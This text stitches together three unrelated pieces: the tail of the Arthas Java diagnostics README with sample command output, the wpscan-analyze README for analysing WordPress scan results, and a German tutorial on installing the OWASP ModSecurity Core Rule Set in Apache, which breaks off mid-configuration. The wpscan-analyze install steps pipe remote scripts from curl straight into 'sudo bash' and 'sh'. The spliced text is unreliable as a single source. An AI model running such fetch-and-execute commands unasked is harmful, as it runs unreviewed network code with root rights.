in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) * https://arthas.aliyun.com/doc/en/tt Record method invocation data, so that you can check the method invocation parameters, returned value, and thrown exceptions later. It works as if you could come back and replay the past method invocation via time tunnel. ```bash $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader * https://arthas.aliyun.com/doc/en/classloader ```bash $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://arthas.aliyun.com/doc/en/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) #### Profiler/FlameGraph * https://arthas.aliyun.com/doc/en/profiler ```bash $ profiler start Started [cpu] profiling ``` ``` $ profiler stop profiler output file: /tmp/demo/arthas-output/20211207-111550.html OK ``` View profiler results under arthas-output via browser: ![](site/src/site/sphinx/_static/arthas-output-svg.jpg) #### Arthas Spring Boot Starter * [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/spring-boot-starter.html) ### Known Users Arthas has more than 120 registered users, [View All](USERS.md). Welcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration) ![Alibaba](static/alibaba.png) ![Alipay](static/alipay.png) ![Aliyun](static/aliyun.png) ![Taobao](static/taobao.png) ![ICBC](static/icbc.png) ![้›ช็ƒ่ดข็ป](static/xueqiu.png) ![้กบไธฐ็ง‘ๆŠ€](static/sf.png) ![่ดๅฃณๆ‰พๆˆฟ](static/ke.png) ![vipkid](static/vipkid.png) ![็™พๅบฆๅ‡คๅทข](static/baidufengchao.png) ![ๆœ‰่ตž](static/youzan.png) ### Derivative Projects * [Bistoury: A project that integrates Arthas](https://github.com/qunarcorp/bistoury) * [A fork of arthas using MVEL](https://github.com/XhinLiang/arthas) ### Credits #### Contributors This project exists, thanks to all the people who contributed. <a href="https://github.com/alibaba/arthas/graphs/contributors"><img src="https://opencollective.com/arthas/contributors.svg?width=890&button=false" /></a> #### Projects * [bytekit](https://github.com/alibaba/bytekit) Java Bytecode Kit. * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/alibaba/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/alibaba/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x * [compiler](https://github.com/skalogs/SkaETL/tree/master/compiler) Arthas's memory compiler. * [Apache Commons Net](https://commons.apache.org/proper/commons-net/) Arthas's telnet client. * [async-profiler](https://github.com/jvm-profiling-tools/async-profiler) Arthas's profiler command.
# wpscan-analyze Analyzes wpscan json output and checks for vulnerabilities [![Linux and macOS Build Status](https://travis-ci.org/lukaspustina/wpscan-analyze.svg?branch=master)](https://travis-ci.org/lukaspustina/wpscan-analyze) [![codecov](https://codecov.io/gh/lukaspustina/wpscan-analyze/branch/master/graph/badge.svg)](https://codecov.io/gh/lukaspustina/wpscan-analyze) [![GitHub release](https://img.shields.io/github/release/lukaspustina/wpscan-analyze.svg)](https://github.com/lukaspustina/wpscan-analyze/releases) [![](https://img.shields.io/crates/v/wpscan-analyze.svg)](https://crates.io/crates/wpscan-analyze) [![MIT licensed](https://img.shields.io/badge/license-MIT-blue.svg?label=License)](./LICENSE) [wpscan](https://wpscan.org) checks WordPress installation for outdated versions, plugins, and themes. `wpscan-analyze` analyses `wpscan`'s JSON output and signals results via exit status, JSON and human readable output. ## Basic Usage `wpscan-analyze` needs an input file in JSON format generated by a run of `wpscan` against a WordPress installation. ### Run wpscan `wpscan --url https://lukas.pustina.de --update --output wpscan.json --format json` ### Run wpscan-analyze ```bash > wpscan-analyze -f wpscan.json wpscan-analyze version=0.0.2, log level=Level(Warn) +--------------------------+---------+---------------+--------------------+------------+------------+ | Component | Version | Version State | Vulnerabilities | Processing | Result | +--------------------------+---------+---------------+--------------------+------------+------------+ | WordPress | 4.9.10 | Latest | No vulnerabilities | Ok | Ok | | Main Theme | 3.2.1 | Latest | No vulnerabilities | Ok | Ok | | Plugin: wp-super-cache | 1.6.3 | Outdated | No vulnerabilities | Ok | Outdated | | Plugin: wp-super-cache | - | Unknown | No vulnerabilities | Ok | Unknown | | Plugin: jm-twitter-cards | 9.4 | Outdated | No vulnerabilities | Ok | Outdated | +--------------------------+---------+---------------+--------------------+------------+------------+ Analyzer result summary: outdated=2, unknown=1, vulnerabilities=1, failed=0 ``` #### Exit codes ``` > echo $? 11 ``` Ok => 0 Error => 1 or other Vulnerable => 11 Outdated => 12 Failed => 13 Unknown => 14 ### Help `man 1 wpscan-analyze` ## Installation ### Ubuntu [x86_64] Please add my [PackageCloud](https://packagecloud.io/lukaspustina/opensource) open source repository and install `wpscan-analyze` via apt. ```bash curl -s https://packagecloud.io/install/repositories/lukaspustina/opensource/script.deb.sh | sudo bash sudo apt-get install wpscan-analyze ``` ### Install script [All Unix platforms] **Simply run:** ```bash curl -s https://raw.githubusercontent.com/lukaspustina/wpscan-analyze/master/install.sh | sh ``` The script will ask you if you want to install `wpscan-analyzer` from source OR from binaries from [release page](https://github.com/lukaspustina/wpscan-analyze/releases) (Linux binary is compilied with Ubuntu). If you don't use Ubuntu linux or MacOs , you'll probably have to build the software from source. If you use a non x86_64 processor, you must build the software from source. ### Manually Install Rust environment and run: ```bash git clone https://github.com/lukaspustina/wpscan-analyze.git cd wpscan-analyze cargo install --path . cd .. wpscan-analyze --version ``` ### Docker Please install [docker](https://docs.docker.com/get-docker/) and run: ```bash git clone https://github.com/lukaspustina/wpscan-analyze cd wpscan-analyze docker image build -t wpscan-analyze . ``` Adjust volume mapping as your convinience. For exemple, with relative paths, run it with: ```bash docker run -it -v "$(pwd):/wpscan-analyze/" wpscan-analyze -f wpscan.json ``` Or share a temp dir: ```bash docker run -it -v "/tmp/:/tmp/" wpscan-analyze -f /tmp/wpscan.json ``` ## Postcardware You're free to use `wpscan-analyze`. If you find it useful, I would highly appreciate you sending me a postcard from your hometown mentioning how you use `wpscan-analyze`. My work address is ``` Lukas Pustina CenterDevice GmbH Rheinwerkallee 3 53227 Bonn German
## Title: OWASP ModSecurity Core Rule Set einbinden ### Was machen wir? Wir binden das OWASP ModSecurity Core Rule Set in unseren Apache Webserver ein und merzen Fehlalarme aus. ### Warum tun wir das? Die Web Application Firewall ModSecurity, wie wir sie in Anleitung Nummer 6 eingerichtet haben, besitzt noch beinahe keine Regeln. Der Schutz spielt aber erst, wenn man ein mรถglichst umfassendes Regelset hinzukonfiguriert. Die Core Rules bieten generisches Blacklisting. Das heisst, sie untersuchen die Anfragen und die Antworten nach Hinweisen auf Angriffe. Die Hinweise sind oft Schlรผsselwรถrter und typische Muster, die auf verschiedenste Arten von Angriffen hindeuten kรถnnen. Das bringt es mit sich, dass auch Fehlalarme ausgelรถst werden (*False Positives*). Fรผr eine erfolgreiche Installation mรผssen wir diese wegkonfigurieren. ### Voraussetzungen * Ein Apache Webserver, idealerweise mit einem File-Layout wie bei [Anleitung 1 (Kompilieren eines Apache Servers)](https://www.netnea.com/cms/apache_tutorial_1_apache_compilieren/) erstellt. * Verstรคndnis der minimalen Konfiguration in [Anleitung 2 (Apache minimal konfigurieren)](https://www.netnea.com/cms/apache_tutorial_2_apache_minimal_konfigurieren/). * Ein Apache Webserver mit SSL-/TLS-Unterstรผtzung wie in [Anleitung 4 (Konfigurieren eines SSL Servers)](https://www.netnea.com/cms/apache-tutorial-4-ssl-server-konfigurieren/) * Ein Apache Webserver mit erweitertem Zugriffslog wie in [Anleitung 5 (Das Zugriffslog Ausbauen und Auswerten)](https://www.netnea.com/cms/apache-tutorial-5-zugriffslog-ausbauen/) * Ein Apache Webserver mit ModSecurity wie in [Anleitung 6 (ModSecurity einbinden)](https://www.netnea.com/cms/apache-tutorial-6-modsecurity-einbinden/) Wir werden mit dem neuen Major Release 3.0 des Core Rule Sets arbeiten; kurz CRS3. Das offizielle CRS3 Paket wird mit einer _INSTALL_ Datei ausgeliefert, welche das Einrichten der Regeln sehr gut erklรคrt (zufรคlligerweise habe ich neben dieser Anleitung hier auch einen grossen Teil des INSTALL Files geschrieben). Wir werden den Installationsprozess aber etwas umstellen, damit er besser auf unsere Bedรผrfnisse passt. ### Schritt 1: OWASP ModSecurity Core Rule Set herunterladen Die ModSecurity Core Rules werden unter dem Dach von *OWASP*, dem Open Web Application Security Project entwickelt. Die Rules selbst liegen auf *GitHub* und kรถnnen wie folgt heruntergeladen werden. ``` $> cd /apache/conf $> wget https://github.com/coreruleset/coreruleset/archive/v3.3.0.tar.gz $> tar -xvzf v3.3.0.tar.gz coreruleset-3.3.0/ coreruleset-3.3.0/CHANGES coreruleset-3.3.0/IDNUMBERING coreruleset-3.3.0/INSTALL coreruleset-3.3.0/KNOWN_BUGS coreruleset-3.3.0/LICENSE coreruleset-3.3.0/README.md coreruleset-3.3.0/crs-setup.conf.example coreruleset-3.3.0/documentation/ coreruleset-3.3.0/documentation/OWASP-CRS-Documentation/ coreruleset-3.3.0/documentation/README ... $> sudo ln -s coreruleset-3.3.0 /apache/conf/crs $> cp crs/crs-setup.conf.example crs/crs-setup.conf $> rm v3.3.0.tar.gz ``` Dies entpackt den Basis Teil des Core Rule Set im Verzeichnis `/apache/conf/coreruleset-3.3.0`. Wir kreieren einen Link von `/apache/conf/crs` in dieses Verzeichnis. Dann kopieren wir eine Datei namens `crs-setup.conf.example` und zum Abschluss lรถschen wir das CRS tar File. Dieses Setup File erlaubt es uns, mit mehreren verschiedenen Einstellungen herumzuspielen. Es lohnt sich einen Blick darauf zu werfen; und sei es nur um zu sehen, was es alles gibt. Fรผr den Moment sind wir aber mit den Basis-Einstellungen zufrieden und werden die Datei nicht anfassen; wir werden einfach sicher stellen, dass es unter dem neuen Dateinamen `crs-setup.conf` zur Verfรผgung steht. Dann kรถnnen wir das Apache Konfigurationsfile anpassen und die Regeln einbinden. ### Schritt 2: Core Rule Set einbinden In der Anleitung 6, in welcher wir ModSecurity selbst eingebunden haben, markierten wir bereits einen Bereich fรผr die Core-Rules. In diesen Bereich fรผgen wir die Include-Direktive jetzt ein. Konkret kommen vier Teile zur bestehenden Konfiguration hinzu. (1) Die Core Rules Basis-Konfiguration, (2) ein Teil fรผr selbst zu definierende Regelausschlรผsse vor dem Core Rule Set (sogenannte Rule Exclusions). Dann (3) die Core Rules selbst und schliesslich ein Teil (4) fรผr selbst zu definierende Regelausschlรผsse nach dem Core Rule Set. Die sogenannten Rule Exclusions bezeichnen Regeln und Direktiven, die dazu dienen, mit den oben beschriebenen Fehlalarmen umzugehen. Manche Fehlalarme mรผssen verhindert werden, bevor die entsprechende Core Rule geladen wird. Manche Fehlalarme kรถnnen erst nach der Definition der Core Rule selbst abgefangen werden. Aber der Reihe nach. Hier zunรคchst der neue Konfigurationsblock den wir in die Basiskonfiguration, die wir beim Einrichten von ModSecurity erstellt haben, einfรผhren: ```bash # === ModSec Core Rule Set Base Configuration (ids: 900000-900999) Include /apache/conf/crs/crs-setup.conf SecAction "id:900110,phase:1,pass,nolog,\ setvar:tx.inbound_anomaly_score_threshold=10000,\ setvar:tx.outbound_anomaly_score_threshold=10000" SecAction "id:900000,phase:1,pass,nolog,\ setvar:tx.paranoia_level=1" # === ModSec Core Rule Set: Runtime Exclusion Rules (ids: 10000-49999) # ... # === ModSecurity Core Rule Set Inclusion Include /apache/conf/crs/rules/*.conf # === ModSec Core Rule Set: Startup Time Rules Exclusions # ... ``` Das CRS arbeitet mit einem Basis-Konfigurationsfile namens `crs-setup.conf`, das wir wรคhrend der Installation vorbereitet haben. Das Kopieren des Files garantiert, dass wir das CRS updaten kรถnnen, ohne dass wir unsere Basis-Konfiguration รผberschreiben - es sei denn, wir wollen das wirklich. Wir kรถnnen die verschiedenen Einstellungen im Basis-Konfigurationsfile anpassen. Die Strategie in dieser Anleitung ist es allerdings, die wichtigen Dinge direkt in unserer Apache Konfiguration zu definieren. Wir mรถchten nicht den kompletten Inhalt von `crs-setup.conf` in unsere Konfiguration einfรผgen, nur um die minimalen Einstellungen zum Start des CRS zu erhalten. Stattdessen laden wir die Datei รผber ein *Include* Statement und setzen diejenigen Werte, die wir zu รคndern gedenken, in der Apache Konfiguration selbst. Ich mรถchte hier auch nicht die ganzen Einstellungen im `crs-setup.conf` referieren, aber ein Blick lohnt sich wirklich. Fรผr den Moment lassen wir das unberรผhrt und nehmen aber wie erwรคhnt drei entscheidende Werte aus `crs-setup.conf` heraus und definieren sie in unserer Konfiguration, damit wir sie dauerhaft in Blick behalten kรถnnen. Zunรคchst setzen wir zwei Limiten in der Regel _900110_: Den Anomalie-Wert der Anfragen und den Anomalie-Wert der Antworten. Dies geschieht mittels der `setvar` Action, welche hier beide Werte auf 10'000 setzt. Was bedeutet das? Das CRS arbeitet per Default mit einem Zรคhl-Mechanismus. Fรผr jede Regel, die eine Anfrage verletzt, wird ein Zรคhler erhรถht. Wenn der Request sรคmtliche Regeln passiert hat, dann wird der Wert mit der Limite verglichen. Sollte er die Limite erreichen, wird der Request blockiert. Dasselbe geschieht mit der Antwort wo wir Informationslecks gegenรผber dem Client verhindern mรถchten. Von Haus aus kommt das CRS im Blocking Mode daher. Wenn eine Regel verletzt wird und der Zรคhler die Limite erreicht, wird die Blockade der Anfrage sofort ausgelรถst. Aber wir sind noch nicht sicher, ob unser Service wirklich sauber lรคuft und die Gefahr von Fehlalarmen ist immer da. Wir mรถchten unerwรผnschte Blockaden verhindern, deshalb setzen wir die Limite zunรคchst bei 10'000 an. Regelverletzungen bringen maximal 5 Punkte. Und selbst wenn die Kumulation mรถglich ist, wird eine Anfrage die Limite kaum erreichen. Aber wir bleiben dennoch prinzipiell im Blocking Mode und wenn unser Vertrauen in unsere Konfiguration wรคchst, dann kรถnnen wir die Limiten einfach schrittweise reduzieren. Die zweite Regel, die Regel `900000`, setzt den _Paranoia Level_ auf 1. Das CRS ist in vier Gruppen von Regeln unterteilt; Regeln der Paranoia Stufen 1 - 4. Wie der Name bereits erahnen lรคsst, je hรถher der Paranoia Level, desto neurotischer die Regeln. Per Default stellen wir den Level auf 1, wo die Regeln noch vernรผnftig und Fehlalarme selten sind. Wenn wir den PL auf 2 erhรถhen, werden neue Regeln hinzugeladen. Nun treten etwas mehr Fehlalarme, sogenannte *False Positives* auf. Deren Zahl steigt mit PL3 weiter an und auf der letzten Stufe PL4 wird es nun Fehlalarme hageln, als ob die Web Application Firewall jeden Sinn fรผr ein vernรผnftiges Mass verloren hรคtte. Fรผr den Moment mรผssen wir aber nur wissen, dass wir die Agressivitรคt des Regelwerks รผber die Paranoia Level Einstellung kontrollieren kรถnnen und dass PL3 und PL4 wirklich fรผr diejenigen Benutzer existieren, welche sehr hohe Sicherheitsanforderungen besitzen. Wir starten bei PL1. ### Schritt 3: Ein genauerer Blick auf den Regel-Ordner Im Zentrum des vorangehenden Konfigurationsblocks liegt ein Include Statement, das sรคmtliche Dateien mit der Endung `.conf` aus dem Unterverzeichnis `rules` im CRS Verzeichnis lรคdt. Schauen wir uns diese Files einmal an: ```bash $> ls -1 crs/rules/*.conf conf/crs/rules/REQUEST-901-INITIALIZATION.conf conf/crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf conf/crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf conf/crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf conf/crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf conf/crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf conf/crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf conf/crs/rules/REQUEST-910-IP-REPUTATION.conf conf/crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf conf/crs/rules/REQUEST-912-DOS-PROTECTION.conf conf/crs/rules/REQUEST-913-SCANNER-DETECTION.conf conf/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf conf/crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf conf/crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf conf/crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf conf/crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf conf/crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf conf/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf conf/crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf conf/crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf conf/crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf conf/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf conf/crs/rules/RESPONSE-950-DATA-LEAKAGES.conf conf/crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf conf/crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf conf/crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf conf/crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf conf/crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf conf/crs/rules/RESPONSE-980-CORRELATION.conf ``` Die Regel Dateien gruppieren sich in Request und in Response Regeln. Wir starten mit einer Initialisierungsregel-Datei mit der Nummer 901. Im `crs-setup.conf` sind sehr viele Sachen auskommentiert. So lange sie nicht aktiviert werden, setzt das 901er Regel-File einfach einen Default-Wert. Dies erlaubt es uns, mit einer einfachen und sauberen Konfiguration zu arbeiten und dennoch vernรผnftige Default-Werte zu setzen. Danach folgen zwei applikationsspezifische Dateien fรผr Drupal und Wordpress. Darauf folgt ein File mit Ausnahmen, das fรผr uns fรผr den Moment ohne Belang ist. Mit 910 geht es mit den richtigen Regeln los. Jede Datei widmet sich einem Thema respektive einem Angriffstyp. Das CRS besetzt den Zahlenraum der IDs von 900'000 bis 999'999. Die ersten drei Ziffern jeder einzelnen Regel korrespondieren mit den drei Ziffern im Namen der Regeldatei. Das bedeutet die IP Reputations Regeln in der Datei `REQUEST-910-IP-REPUTATION.conf` besetzen den Zahlrenaum von 910'000 bis 910'999. Die Regeln, welche die Methode durchsetzen, folgen von 911'000 bis 911'999, und so weiter. Manche dieser Regeldateien sind klein und sie nรผtzen den ihnen zugewiesenen Zahlenraum bei weitem nicht aus. Andere sind viel grรถsser und die berรผchtigten SQL Injection Regeln riskieren das Dach ihrer IDs eines Tages zu erreichen. Eine wichtige Datei ist `REQUEST-949-BLOCKING-EVALUATION.conf`. Darin wird der Anomalie-Wert gegen die Limite fรผr die eingehenden Anfragen verglichen und gegebenenfalls blockiert. Darauf folgenden die Regeln, die sich um die Antworten kรผmmern. Sie sind geringer in der Anzahl und suchen prinzipiell nach Code Lecks (Stack Traces!) und Lecks in Fehlermeldungen (die einem Angreifer sehr dabei helfen, eine SQL Attacke zu konstruieren). Der Anomalie-Wert der Antworten wird im Regel-File mit dem Prefix 959 รผberprรผft. Manche Regeln kommen mit Daten-Files. Diese Dateien haben die `.data` Endung und residieren in demselben Verzeichnis, wie die Regeln. Diese Daten-Files werden typischerweise dann verwendet, wenn eine Anfrage gegen eine lange Liste mit Schlรผsselwรถrtern wie unerwรผnschte User-Agents oder PHP Funktionsnamen geprรผft werden mรผssen. Es ist ganz interessant, da mal einen Blick drauf zu werfen. In unserer Apache Konfiguration ist vor und nach der *Include* Direktive fรผr die Regeln etwas Platz frei. Dort werden wir uns in Zukunft um die Fehlalarme kรผmmern. Manche werden behandelt, bevor die Regel selbst zugeladen wird. Andere kommen erst zum Zug, wenn die Regel bereits hereingeladen wurde; also nach dem *Include* Statement. Wir kommen spรคter in dieser Anleitung darauf zurรผck. Der Vollstรคndigkeit halber hier die komplette Apache Konfiguration inklusive ModSecurity, dem CRS und all den Konfigurationsteilen von frรผheren Anleitungen auf die wir uns abstรผtzen. ```bash ServerName localhost ServerAdmin root@localhost ServerRoot /apache User www-data Group www-data PidFile logs/httpd.pid ServerTokens Prod UseCanonicalName On TraceEnable Off Timeout 10 MaxRequestWorkers 100 Listen 127.0.0.1:80 Listen 127.0.0.1:443 LoadModule mpm_event_module modules/mod_mpm_event.so LoadModule unixd_module modules/mod_unixd.so LoadModule log_config_module modules/mod_log_config.so LoadModule logio_module modules/mod_logio.so LoadModule authn_core_module modules/mod_authn_core.so LoadModule authz_core_module modules/mod_authz_core.so LoadModule ssl_module modules/mod_ssl.so LoadModule headers_module modules/mod_headers.so LoadModule unique_id_module modules/mod_unique_id.so LoadModule security2_module modules/mod_security2.so ErrorLogFormat "[%{cu}t] [%-m:%-l] %-a %-L %M" LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \ \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended LogFormat "[%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] %{UNIQUE_ID}e %D \ PerfModSecInbound: %{TX.perf_modsecinbound}M \ PerfAppl: %{TX.perf_application}M \ PerfModSecOutbound: %{TX.perf_modsecoutbound}M \ TS-Phase1: %{TX.ModSecTimestamp1start}M-%{TX.ModSecTimestamp1end}M \ TS-Phase2: %{TX.ModSecTimestamp2start}M-%{TX.ModSecTimestamp2end}M \ TS-Phase3: %{TX.ModSecTimestamp3start}M-%{TX.ModSecTimestamp3end}M \ TS-Phase4: %{TX.ModSecTimestamp4start}M-%{TX.ModSecTimestamp4end}M \ TS-Phase5: %{TX.ModSecTimestamp5start}M-%{TX.ModSecTimestamp5end}M \ Perf-Phase1: %{PERF_PHASE1}M \ Perf-Phase2: %{PERF_PHASE2}M \ Perf-Phase3: %{PERF_PHASE3}M \ Perf-Phase4: %{PERF_PHASE4}M \ Perf-Phase5: %{PERF_PHASE5}M \ Perf-ReadingStorage: %{PERF_SREAD}M \ Perf-WritingStorage: %{PERF_SWRITE}M \ Perf-GarbageCollection: %{PERF_GC}M \ Perf-ModSecLogging: %{PERF_LOGGING}M \ Perf-ModSecCombined: %{PERF_COMBINED}M" perflog LogLevel debug ErrorLog logs/error.log CustomLog logs/access.log extended CustomLog logs/modsec-perf.log perflog env=write_perflog # == ModSec Base Configuration SecRuleEngine On SecRequestBodyAccess On SecRequestBodyLimit 10000000 SecRequestBodyNoFilesLimit 64000 SecResponseBodyAccess On SecResponseBodyLimit 10000000 SecPcreMatchLimit 100000 SecPcreMatchLimitRecursion 100000 SecTmpDir /tmp/ SecUploadDir /tmp/ SecDataDir /tmp/ SecDebugLog /apache/logs/modsec_debug.log SecDebugLogLevel 0 SecAuditEngine RelevantOnly SecAuditLogRelevantStatus "^(?:5|4(?!04))" SecAuditLogParts ABIJEFHKZ SecAuditLogType Concurrent SecAuditLog /apache/logs/modsec_audit.log SecAuditLogStorageDir /apache/logs/audit/ SecDefaultAction "phase:2,pass,log,tag:'Local Lab Service'" # == ModSec Rule ID Namespace Definition # Service-specific before Core-Rules: 10000 - 49999 # Service-specific after Core-Rules: 50000 - 79999 # Locally shared rules: 80000 - 99999 # - Performance: 90000 - 90199 # Recommended ModSec Rules (few): 200000 - 200010 # OWASP Core-Rules: 900000 - 999999 # === ModSec timestamps at the start of each phase (ids: 90000 - 90009) SecAction "id:90000,phase:1,nolog,pass,setvar:TX.ModSecTimestamp1start=%{DURATION}" SecAction "id:90001,phase:2,nolog,pass,setvar:TX.ModSecTimestamp2start=%{DURATION}" SecAction "id:90002,phase:3,nolog,pass,setvar:TX.ModSecTimestamp3start=%{DURATION}" SecAction "id:90003,phase:4,nolog,pass,setvar:TX.ModSecTimestamp4start=%{DURATION}" SecAction "id:90004,phase:5,nolog,pass,setvar:TX.ModSecTimestamp5start=%{DURATION}" # SecRule REQUEST_FILENAME "@beginsWith /" "id:90005,phase:5,t:none,nolog,noauditlog,pass,\ # setenv:write_perflog" # === ModSec Recommended Rules (in modsec src package) (ids: 200000-200010) SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ "id:200000,phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" SecRule REQUEST_HEADERS:Content-Type "application/json" \ "id:200001,phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON" SecRule REQBODY_ERROR "!@eq 0" \ "id:200002,phase:2,t:none,deny,status:400,log,msg:'Failed to parse request body.',\ logdata:'%{reqbody_error_msg}',severity:2" SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ "id:200003,phase:2,t:none,log,deny,status:403, \ msg:'Multipart request body failed strict validation: \ PE %{REQBODY_PROCESSOR_ERROR}, \ BQ %{MULTIPART_BOUNDARY_QUOTED}, \ BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ DB %{MULTIPART_DATA_BEFORE}, \ DA %{MULTIPART_DATA_AFTER}, \ HF %{MULTIPART_HEADER_FOLDING}, \ LF %{MULTIPART_LF_LINE}, \ SM %{MULTIPART_MISSING_SEMICOLON}, \ IQ %{MULTIPART_INVALID_QUOTING}, \ IP %{MULTIPART_INVALID_PART}, \ IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ FL %{MULTIPART_FILE_LIMIT_EXCEEDED}'" SecRule TX:/^MSC_/ "!@streq 0" \ "id:200005,phase:2,t:none,deny,status:500,\ msg:'ModSecurity internal error flagged: %{MATCHED_VAR_NAME}'" # === ModSec Core Rule Set Base Configuration (ids: 900000-900999) Include /apache/conf/crs/crs-setup.conf SecAction "id:900110,phase:1,pass,nolog,\ setvar:tx.inbound_anomaly_score_threshold=10000,\ setvar:tx.outbound_anomaly_score_threshold=10000" SecAction "id:900000,phase:1,pass,nolog,\ setvar:tx.paranoia_level=1" # === ModSec Core Rule Set: Runtime Exclusion Rules (ids: 10000-49999) # ... # === ModSecurity Core Rule Set Inclusion Include /apache/conf/crs/rules/*.conf # === ModSec Core Rule Set: Config Time Exclusion Rules (no ids) # ... # === ModSec Timestamps at the End of Each Phase (ids: 90010 - 90019) SecAction "id:90010,phase:1,pass,nolog,setvar:TX.ModSecTimestamp1end=%{DURATION}" SecAction "id:90011,phase:2,pass,nolog,setvar:TX.ModSecTimestamp2end=%{DURATION}" SecAction "id:90012,phase:3,pass,nolog,setvar:TX.ModSecTimestamp3end=%{DURATION}" SecAction "id:90013,phase:4,pass,nolog,setvar:TX.ModSecTimestamp4end=%{DURATION}" SecAction "id:90014,phase:5,pass,nolog,setvar:TX.ModSecTimestamp5end=%{DURATION}" # === ModSec performance calculations and variable export (ids: 90100 - 90199) SecAction "id:90100,phase:5,pass,nolog,\ setvar:TX.perf_modsecinbound=%{PERF_PHASE1},\ setvar:TX.perf_modsecinbound=+%{PERF_PHASE2},\ setvar:TX.perf_application=%{TX.ModSecTimestamp3start},\ setvar:TX.perf_application=-%{TX.ModSecTimestamp2end},\ setvar:TX.perf_modsecoutbound=%{PERF_PHASE3},\ setvar:TX.perf_modsecoutbound=+%{PERF_PHASE4},\ setenv:ModSecTimeIn=%{TX.perf_modsecinbound},\ setenv:ApplicationTime=%{TX.perf_application},\ setenv:ModSecTimeOut=%{TX.perf_modsecoutbound},\ 